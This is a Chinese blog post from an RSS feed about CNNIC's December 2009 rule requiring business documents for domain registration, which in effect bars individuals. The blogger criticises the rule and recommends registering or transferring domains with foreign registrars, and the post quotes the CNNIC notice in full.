<p>　　在遭到央视点名批评后，中国域名监管机构CNNIC处罚了三家域名注册服务及代理机构，并在官方网站接连发出数则加强域名注册信息审核工作的公告，而最新公告规定，从2009年12月14日上午9时起，个人用户没有资格进行域名注册。</p>
<p>　　该公告要求用户向域名注册服务机构在线提交域名注册申请的同时，应当提交书面申请材料。申请材料包括加盖公章的域名注册申请表（原件）、企业营业执照或组织机构代码证（复印件）、注册联系人身份证明（复印件）。个人用户由于无法提供企业营业执照或组织机构代码证，因此也没有资格进行域名注册。这也意味着，个人用户在未来将无法在国内注册包括COM、NET、CN等在内的所有域名。</p>
<p><a href="http://www.lixiaopeng.org/blog/wp-content/uploads/2009/12/domestic-domain-name-registration-service-to-stop-individuals-with-access-to.jpg"><img src="http://www.lixiaopeng.org/blog/wp-content/uploads/2009/12/domestic-domain-name-registration-service-to-stop-individuals-with-access-to.jpg" alt="domestic-domain-name-registration-service-to-stop-individuals-with-access-to" title="domestic-domain-name-registration-service-to-stop-individuals-with-access-to" width="476" height="353" class="alignnone size-full wp-image-1316" /></a></p>
<p>　　对于个人网站用户来说，我以前就说过不要在国内注册域名，现在是彻底无法在国内注册了，中国的域名注册服务辛辛苦苦发展了十多年，现在一夜回到解放前，在广电的强势进攻之下，工信部可谓一败涂地，现在连个人用户都无法在国内进行域名注册了，互联网的发展历史性的倒退了。</p>
<p>　　这样的要求除了让个人网站更难注册域名之外，还减少CNNIC自身的业务，可谓损人不利己。现在已经不是十年前了，各大银行的个人信用卡业务已经茁壮发展起来了，只要申请一张国际信用卡，就可以轻松在国外网站进行域名注册，注册填写的信息更加难以监管和监控，CNNIC还失去了对这些域名的控制权。</p>
<p>　　因此，现在还在使用国内域名注册服务的个人网站，应该充分认识到这方面存在的巨大不确定风险，尽快将域名转到国外，例如美国的注册商。美国是法制国家，域名注册商绝对不会出卖客户的隐私信息的，也不会违规取消客户的域名。因此，在美国注册域名安全、可靠、实惠，总的来说远远优于在国内域名注册服务。具体操作可参见这篇“万网域名转出攻略”。</p>
<p>　　新注册的个人网站用户，由于国内已经不允许个人注册域名，因此只能在国外注册，注册可参见我这篇“在国外进行国际域名注册”的攻略。</p>
<p>　　没有信用卡的用户，可以寻找一些代购服务，让有信用卡的用户代购，也可以做一些国外的广告，将收入接收到自己的PayPal帐号，然后使用PayPal支付域名费用。</p>
<p>　　附：CNNIC关于进一步加强域名注册信息审核工作的公告</p>
<p>　　为了提升域名注册信息的真实性、准确性、完整性，进一步加强域名注册信息审核工作，现通知如下要求：</p>
<p>　　1、用户向域名注册服务机构在线提交域名注册申请的同时，应当提交书面申请材料。申请材料包括加盖公章的域名注册申请表（原件）、企业营业执照或组织机构代码证（复印件）、注册联系人身份证明（复印件）。</p>
<p>　　2、域名注册服务机构应当认真审核用户提交的书面申请材料，审核合格后，将书面申请材料通过传真或电子邮件的形式提交至我中心，并保留书面申请资料。</p>
<p>　　3、自域名提交在线申请之日起5日内我中心未收到书面申请材料的或域名申请材料审核不符合条件的，该域名将予以注销。</p>
<p>　　4、以上要求自2009年12月14日上午9时起施行。</p>
<p>　　中国互联网络信息中心　　2009年12月11日</p>
<h3  class="related_post_title">您可能对以下文章有兴趣↓</h3><ul class="related_post"><li><a href="http://www.lixiaopeng.org/live-domains-at-godaddycom-create-mx-dns-srv-records/" title="Live Domains在GoDaddy.com 创建 MX/DNS/SRV 记录">Live Domains在GoDaddy.com 创建 MX/DNS/SRV 记录</a></li><li><a href="http://www.lixiaopeng.org/switch-off-automatically-renew-godaddy/" title="关掉Godaddy自动续费">关掉Godaddy自动续费</a></li><li><a href="http://www.lixiaopeng.org/godaddy-domain-name-into-lixiaopengorg-success/" title="域名lixiaopeng.org成功转入Godaddy">域名lixiaopeng.org成功转入Godaddy</a></li><li><a href="http://www.lixiaopeng.org/lixiaopengorg-apply-to-transfer-to-the-godaddy/" title="lixiaopeng.org申请转入GODADDY了">lixiaopeng.org申请转入GODADDY了</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.lixiaopeng.org/domestic-domain-name-registration-service-to-stop-individuals-with-access-to/feed/</wfw:commentRss>
		<slash:comments>159</slash:comments>
		</item>
	</channel>
</rss>
